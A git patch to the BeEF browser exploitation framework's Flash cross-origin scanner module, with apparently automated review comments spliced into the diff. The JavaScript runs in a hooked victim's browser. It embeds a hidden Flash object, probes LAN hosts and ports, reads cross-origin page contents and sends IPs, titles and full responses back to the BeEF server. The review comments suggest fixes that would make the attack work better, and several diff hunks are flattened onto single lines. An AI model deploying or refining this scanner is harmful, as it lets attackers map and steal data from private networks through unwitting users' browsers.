From fa1e32c0462323dd8349a5a16438259606dcfd91 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Fri, 8 Apr 2016 16:25:52 +0000
Subject: [PATCH] Use SWFObject library for cross_origin_scanner_flash
---
 arerules/lan_flash_scan.json | 3 +-
 arerules/lan_flash_scan_common.json | 3 +-
 .../cross_origin_scanner_flash/command.js | 150 +++++++++---------
 .../cross_origin_scanner_flash/config.yaml | 2 +-
 .../cross_origin_scanner_flash/module.rb | 15 +-
 .../cross_origin_scanner_flash/swfobject.js | 4 +
 6 files changed, 97 insertions(+), 80 deletions(-)
 create mode 100644 modules/network/cross_origin_scanner_flash/swfobject.js
diff --git a/arerules/lan_flash_scan.json b/arerules/lan_flash_scan.json
index 4026eddbf..b023e0a66 100644
--- a/arerules/lan_flash_scan.json
+++ b/arerules/lan_flash_scan.json
@@ -17,8 +17,7 @@
 "ipRange":"<>",
 "ports":"80,8080",
 "threads":"2",
- "wait":"2",
- "timeout":"10"
+ "timeout":"5"
 }
 }
 ],
diff --git a/arerules/lan_flash_scan_common.json b/arerules/lan_flash_scan_common.json
index f6b16b72e..7726a5472 100644
--- a/arerules/lan_flash_scan_common.json
+++ b/arerules/lan_flash_scan_common.json
@@ -12,8 +12,7 @@
 "ipRange":"common",
 "ports":"80,8080",
 "threads":"2",
- "wait":"2",
- "timeout":"10"
+ "timeout":"5"
 }
 }
 ],
diff --git a/modules/network/cross_origin_scanner_flash/command.js b/modules/network/cross_origin_scanner_flash/command.js
index 44a38e2f1..030b5bee9 100644
--- a/modules/network/cross_origin_scanner_flash/command.js
+++ b/modules/network/cross_origin_scanner_flash/command.js
@@ -11,8 +11,8 @@ beef.execute(function() {
 var ports = "<%= @ports %>";
 var threads = parseInt("<%= @threads %>", 10);
 var timeout = parseInt("<%= @timeout %>", 10)*1000;
- var wait = parseInt("<%= @wait %>", 10)*1000;
 
+ // check if Flash is installed (not always reliable)
 if(!beef.browser.hasFlash()) {
 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error());
 return;
@@ -52,7 +52,6 @@ beef.execute(function() { return; } // ipRange will be in the form of 192.168.0.1-192.168.0.254 - // the fourth octet will be iterated. // (only C class IP ranges are supported atm) ipBounds = ipRange.split('-'); lowerBound = ipBounds[0].split('.')[3]; @@ -63,13 +62,12 @@ beef.execute(function() { } } - WorkerQueue = function(frequency) { - + // configure workers + WorkerQueue = function(id, frequency) { var stack = []; var timer = null; var frequency = frequency; var start_scan = (new Date).getTime(); - this.process = function() { var item = stack.shift(); eval(item); 
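Review bot: In the second hunk (`@@ -63,13 +62,12 @@`) the changed line still assigns `WorkerQueue` without a declaration, so it becomes a global in the page that runs the script, or a ReferenceError under strict mode; `var WorkerQueue = function(id, frequency) {` keeps it local to the `beef.execute` callback. The unchanged `var frequency = frequency;` just below redeclares the parameter and does nothing, so it can be dropped. `this.process` begins in this hunk and continues outside it. It runs each queued job through `eval(item)`, and the later `worker.queue(...)` call builds those jobs by concatenating host and port values into source text. Queuing functions instead, `worker.queue(scanUrl.bind(null, proto, host, port));` with `item();` in `process`, would avoid generating code from data.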
@@ -77,91 +75,101 @@ beef.execute(function() { clearInterval(timer); timer = null; var interval = (new Date).getTime() - start_scan; - beef.debug("[Cross-Origin Scanner (Flash)] Worker queue is complete ["+interval+" ms]"); + beef.debug("[Cross-Origin Scanner (Flash)] Worker #"+id+" has finished ["+interval+" ms]"); return; } } - this.queue = function(item) { stack.push(item); - if (timer === null) { - timer = setInterval(this.process, frequency); - } + if (timer === null) timer = setInterval(this.process, frequency); } - } - var init = function(id, port) { - var newObjectTag; - var attr = {}, param = {}; - var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf'; - attr = {id: 'cross_origin_flash_<%= @command_id %>_'+id+'_'+port, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'}; - param = {'AllowScriptAccess': 'always'}; - attr.data = url; - newObjectTag = createHTMLObject(attr,param); - beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the new object..."); - document.body.appendChild(newObjectTag); - }; - - // create and embed Flash object - var createHTMLObject = function(attributes, parameters) { - var i, html, div, obj, attr = attributes || {}, param = parameters || {}; - html = ''; - html += ''; + // load the SWF object from the BeEF server + // then request the specified URL via Flash + var scanUrl = function(proto, host, port) { + beef.debug('[Cross-Origin Scanner (Flash)] Creating Flash object...'); + var placeholder_id = Math.random().toString(36).substring(2,10); div = document.createElement('div'); - div.innerHTML = html; - obj = div.firstChild; - div.removeChild(obj); - return obj; - }; + div.setAttribute('id', placeholder_id); + div.setAttribute('style', 'visibility: hidden'); + $j('body').append(div); - // fetch a URL with Flash - var get_url = function(proto, host, port, id) { - var objCaller; - var url = 
'http://'+host+':'+port+'/'; - beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url); - objCaller = document.getElementById('cross_origin_flash_<%= @command_id %>_'+id+'_'+port); try { - objCaller.GETURL('function(data) { '+ - 'var proto = "http";' + - 'var host = "'+host+'";' + - 'var port = "'+port+'";' + - 'var data = unescape(data);' + - 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + - 'if (!data.match("Hijacked Contents:")) return;' + - 'var response = data.replace(/^Hijacked Contents:\\r\\n/);' + - 'var title = "";' + - 'if (response.match("(.*?)<\\/title>")) {' + - ' title = response.match("<title>(.*?)<\\/title>")[1];' + - '}' + - 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + - ' }', url); - } catch(e) { - beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); - } - setTimeout('document.body.removeChild(document.getElementById("cross_origin_flash_<%= @command_id %>_'+id+'_'+port+'"));', timeout); + swfobject.embedSWF( + beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf', + placeholder_id, + "1", // Width + "1", // Height + "9", // Flash version required. Hard-coded to 9+ for no real reason. Tested on Flash 12. 
+ false, // Don't prompt user to install Flash + {}, // FlashVars + {'AllowScriptAccess': 'always'}, + {id: 'cross_origin_flash_'+placeholder_id, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'}, + function (e) { + if (e.success) { + // 200 millisecond delay due to Flash executing the callback with a success event + // even though the object is not yet ready to expose its methods to JS + setTimeout(function(){ + var url = 'http://'+host+':'+port+'/'; + beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url); + var objCaller = document.getElementById('cross_origin_flash_'+placeholder_id); + try { + objCaller.GETURL('function(data) { '+ + 'var proto = "http";' + + 'var host = "'+host+'";' + + 'var port = "'+port+'";' + + 'var data = unescape(data);' + + 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + + + 'if (data.match("securityErrorHandler")) {' + + ' beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip="+host+"&status=alive");' + + '}' + + + 'if (!data.match("Hijacked Contents:")) return;' + + 'var response = data.replace(/^Hijacked Contents:\\r\\n/);' + + + 'var title = "";' + + 'if (response.match("<title>(.*?)<\\/title>")) {' + + ' title = response.match("<title>(.*?)<\\/title>")[1];' + + '}' + + + 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + ' }', url); + } catch(e) { + beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); + } + }, 200); + } else if (e.error) { + beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object'); + } else beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object. 
Perhaps Flash is not installed?'); + }); + // Remove the SWF object from the DOM after <timeout> seconds + // this also kills the outbound connections from the SWF object + setTimeout('try { document.body.removeChild(document.getElementById("cross_origin_flash_'+placeholder_id+'")); } catch(e) {}', timeout); + } catch (e) { + beef.debug("[Cross-Origin Scanner (Flash)] Something went horribly wrong creating the Flash object with swfobject: " + e.message); + } + beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the flash object to load..."); } + // append SWFObject script + $j('body').append('<scr'+'ipt type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></scr'+'ipt>'); + + // create workers beef.debug("[Cross-Origin Scanner (Flash)] Starting scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)"); - - // create worker queue var workers = new Array(); - for (w=0; w < threads; w++) { - workers.push(new WorkerQueue(wait)); - } + for (var id = 0; id < threads; id++) workers.push(new WorkerQueue(id, timeout)); - // send Flash request to each IP - var proto = 'http'; - for (var i=0; i < ips.length; i++) { + // allocate jobs to workers + for (var i = 0; i < ips.length; i++) { var worker = workers[i % threads]; - for (var p=0; p < ports.length; p++) { + for (var p = 0; p < ports.length; p++) { var host = ips[i]; var port = ports[p]; - worker.queue("init("+i+", "+port+"); setTimeout(function() {get_url('"+proto+"', '"+host+"', '"+port+"', "+i+");}, 2000)"); + if (port == '443') var proto = 'https'; else var proto = 'http'; + worker.queue("scanUrl('"+proto+"', '"+host+"', '"+port+"');"); } } diff --git a/modules/network/cross_origin_scanner_flash/config.yaml b/modules/network/cross_origin_scanner_flash/config.yaml index 4dc49c978..52ec8a3a6 100644 --- a/modules/network/cross_origin_scanner_flash/config.yaml +++ b/modules/network/cross_origin_scanner_flash/config.yaml 
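Review bot: `scanUrl(proto, host, port)` never reads `proto`: the request URL is built as `'http://'+host+':'+port+'/'` and the generated callback hard-codes `var proto = "http"`. The new `port == '443'` branch in the job loop therefore has no effect, and a result for that port is still reported with `proto=http`. Either drop the branch or use the argument in both places, `var url = proto+'://'+host+':'+port+'/';` and `'var proto = "'+proto+'";' +`. Two smaller points in the same function: `div = document.createElement('div');` lacks `var` and leaks a global into the page. `data.replace(/^Hijacked Contents:\\r\\n/)` passes no replacement, so the prefix is replaced by the string `undefined`; passing `''` as the second argument fixes it.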
@@ -9,7 +9,7 @@ beef: enable: true category: "Network" name: "Cross-Origin Scanner (Flash)" - description: "Scan an IP range for web servers which allow cross-origin requests using Flash. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses.<br/><br/>This module uses ContentHijacking.swf from <a href='https://github.com/nccgroup/CrossSiteContentHijacking'>CrossSiteContentHijacking</a> by Soroush Dalili (@irsdl)." + description: "This module scans an IP range to locate web servers with a permissive Flash cross-origin policy. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses.<br/><br/>This module uses ContentHijacking.swf from <a href='https://github.com/nccgroup/CrossSiteContentHijacking'>CrossSiteContentHijacking</a> by Soroush Dalili (@irsdl)." authors: ["bcoles", "@irsdl"] target: working: ["C", "FF"] diff --git a/modules/network/cross_origin_scanner_flash/module.rb b/modules/network/cross_origin_scanner_flash/module.rb index eb4c933bc..34e6db75c 100644 --- a/modules/network/cross_origin_scanner_flash/module.rb +++ b/modules/network/cross_origin_scanner_flash/module.rb @@ -7,6 +7,7 @@ class Cross_origin_scanner_flash < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/cross_origin_scanner_flash/ContentHijacking.swf','/objects/ContentHijacking','swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/cross_origin_scanner_flash/swfobject.js', '/swfobject', 'js') end def post_execute 
@@ -19,8 +20,15 @@ class Cross_origin_scanner_flash < BeEF::Core::Command session_id = @datastore['beefhook'] - # log the network service - if @datastore['results'] =~ /proto=(.+)&ip=(.+)&port=([\d]+)&title/ + # log discovered hosts + if @datastore['results'] =~ /^ip=(.+)&status=alive$/ + ip = $1 + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip) + end + # log discovered network services + elsif @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&title/ proto = $1 ip = $2 port = $3 @@ -39,8 +47,7 @@ class Cross_origin_scanner_flash < BeEF::Core::Command {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '2'}, - {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '2'}, - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'} + {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '5'} ] end diff --git a/modules/network/cross_origin_scanner_flash/swfobject.js b/modules/network/cross_origin_scanner_flash/swfobject.js new file mode 100644 index 000000000..8eafe9dd8 --- /dev/null +++ b/modules/network/cross_origin_scanner_flash/swfobject.js 
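Review bot: In the first hunk (`@@ -19,8 +20,15 @@`) both new patterns anchor with `^` and `$`, which in Ruby match at every line boundary rather than only at the ends of the string. `@datastore['results']` appears to carry the string built in command.js, which ends with `&response=` followed by the fetched response body, and such a body normally spans several lines. Any line in that body shaped like a host report would then satisfy the first branch, so a host record is added from third-party content and the `elsif` service branch is skipped. Anchoring to the whole string avoids this: `if @datastore['results'] =~ /\Aip=(.+)&status=alive\z/` and `elsif @datastore['results'] =~ /\Aproto=(.+)&ip=(.+)&port=([\d]+)&title/`. The `elsif` body continues outside the hunk, so whether `proto`, `ip` and `port` are validated before being stored cannot be confirmed from here.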
@@ -0,0 +1,4 @@ +/* SWFObject v2.2 <http://code.google.com/p/swfobject/> + is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof 
j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y<X;Y++){U[Y]()}}function K(X){if(J){X()}else{U[U.length]=X}}function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load",Y,false)}else{if(typeof j.addEventListener!=D){j.addEventListener("load",Y,false)}else{if(typeof O.attachEvent!=D){i(O,"onload",Y)}else{if(typeof O.onload=="function"){var X=O.onload;O.onload=function(){X();Y()}}else{O.onload=Y}}}}}function h(){if(T){V()}else{H()}}function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setAttribute("type",q);var Z=X.appendChild(aa);if(Z){var Y=0;(function(){if(typeof Z.GetVariable!=D){var ab=Z.GetVariable("$version");if(ab){ab=ab.split(" ")[1].split(",");M.pv=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}else{if(Y<10){Y++;setTimeout(arguments.callee,10);return}}X.removeChild(aa);Z=null;H()})()}else{H()}}function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[af].id;var ab=o[af].callbackFn;var aa={success:false,id:Y};if(M.pv[0]>0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var 
X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad<ac;ad++){if(X[ad].getAttribute("name").toLowerCase()!="movie"){ah[X[ad].getAttribute("name")]=X[ad].getAttribute("value")}}P(ai,ah,Y,ab)}else{p(ae);if(ab){ab(aa)}}}}}else{w(Y,true);if(ab){var Z=z(Y);if(Z&&typeof Z.SetVariable!=D){aa.success=true;aa.ref=Z}ab(aa)}}}}}function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typeof Y.SetVariable!=D){X=Y}else{var Z=Y.getElementsByTagName(r)[0];if(Z){X=Z}}}return X}function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X);if(ae){if(ae.nodeName=="OBJECT"){l=g(ae);Q=null}else{l=ae;Q=X}aa.id=R;if(typeof aa.width==D||(!/%$/.test(aa.width)&&parseInt(aa.width,10)<310)){aa.width="310"}if(typeof aa.height==D||(!/%$/.test(aa.height)&&parseInt(aa.height,10)<137)){aa.height="137"}j.title=j.title.slice(0,47)+" - Flash Player Installation";var ad=M.ie&&M.win?"ActiveX":"PlugIn",ac="MMredirectURL="+O.location.toString().replace(/&/g,"%26")+"&MMplayerType="+ad+"&MMdoctitle="+j.title;if(typeof ab.flashvars!=D){ab.flashvars+="&"+ac}else{ab.flashvars=ac}if(M.ie&&M.win&&ae.readyState!=4){var Y=C("div");X+="SWFObjectNew";Y.setAttribute("id",X);ae.parentNode.insertBefore(Y,ae);ae.style.display="none";(function(){if(ae.readyState==4){ae.parentNode.removeChild(ae)}else{setTimeout(arguments.callee,10)}})()}u(aa,ab,X)}}function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNode.insertBefore(X,Y);X.parentNode.replaceChild(g(Y),X);Y.style.display="none";(function(){if(Y.readyState==4){Y.parentNode.removeChild(Y)}else{setTimeout(arguments.callee,10)}})()}else{Y.parentNode.replaceChild(g(Y),Y)}}function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML}else{var Y=ab.getElementsByTagName(r)[0];if(Y){var ad=Y.childNodes;if(ad){var X=ad.length;for(var 
Z=0;Z<X;Z++){if(!(ad[Z].nodeType==1&&ad[Z].nodeName=="PARAM")&&!(ad[Z].nodeType==8)){aa.appendChild(ad[Z].cloneNode(true))}}}}}return aa}function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(typeof ai.id==D){ai.id=Y}if(M.ie&&M.win){var ah="";for(var ae in ai){if(ai[ae]!=Object.prototype[ae]){if(ae.toLowerCase()=="data"){ag.movie=ai[ae]}else{if(ae.toLowerCase()=="styleclass"){ah+=' class="'+ai[ae]+'"'}else{if(ae.toLowerCase()!="classid"){ah+=" "+ae+'="'+ai[ae]+'"'}}}}}var af="";for(var ad in ag){if(ag[ad]!=Object.prototype[ad]){af+='<param name="'+ad+'" value="'+ag[ad]+'" />'}}aa.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+ah+">"+af+"</object>";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var 
aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab<ac;ab++){I[ab][0].detachEvent(I[ab][1],I[ab][2])}var Z=N.length;for(var aa=0;aa<Z;aa++){y(N[aa])}for(var Y in M){M[Y]=null}M=null;for(var X in swfobject){swfobject[X]=null}swfobject=null})}}();return{registerObject:function(ab,X,aa,Z){if(M.w3&&ab&&X){var Y={};Y.id=ab;Y.swfVersion=X;Y.expressInstall=aa;Y.callbackFn=Z;o[o.length]=Y;w(ab,false)}else{if(Z){Z({success:false,id:ab})}}},getObjectById:function(X){if(M.w3){return z(X)}},embedSWF:function(ab,ah,ae,ag,Y,aa,Z,ad,af,ac){var X={success:false,id:ah};if(M.w3&&!(M.wk&&M.wk<312)&&ab&&ah&&ae&&ag&&Y){w(ah,false);K(function(){ae+="";ag+="";var aj={};if(af&&typeof af===r){for(var al in af){aj[al]=af[al]}}aj.data=ab;aj.width=ae;aj.height=ag;var am={};if(ad&&typeof ad===r){for(var ak in ad){am[ak]=ad[ak]}}if(Z&&typeof Z===r){for(var ai in Z){if(typeof am.flashvars!=D){am.flashvars+="&"+ai+"="+Z[ai]}else{am.flashvars=ai+"="+Z[ai]}}}if(F(Y)){var 
an=u(aj,am,ah);if(aj.id==ah){w(ah,true)}X.success=true;X.ref=an}else{if(aa&&A()){aj.data=aa;P(aj,am,ah,ac);return}else{w(ah,true)}}if(ac){ac(X)}})}else{if(ac){ac(X)}}},switchOffAutoHideShow:function(){m=false},ua:M,getFlashPlayerVersion:function(){return{major:M.pv[0],minor:M.pv[1],release:M.pv[2]}},hasFlashPlayerVersion:F,createSWF:function(Z,Y,X){if(M.w3){return u(Z,Y,X)}else{return undefined}},showExpressInstall:function(Z,aa,X,Y){if(M.w3&&A()){P(Z,aa,X,Y)}},removeSWF:function(X){if(M.w3){y(X)}},createCSS:function(aa,Z,Y,X){if(M.w3){v(aa,Z,Y,X)}},addDomLoadEvent:K,addLoadEvent:s,getQueryParamValue:function(aa){var Z=j.location.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X++){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}(); \ No newline at end of file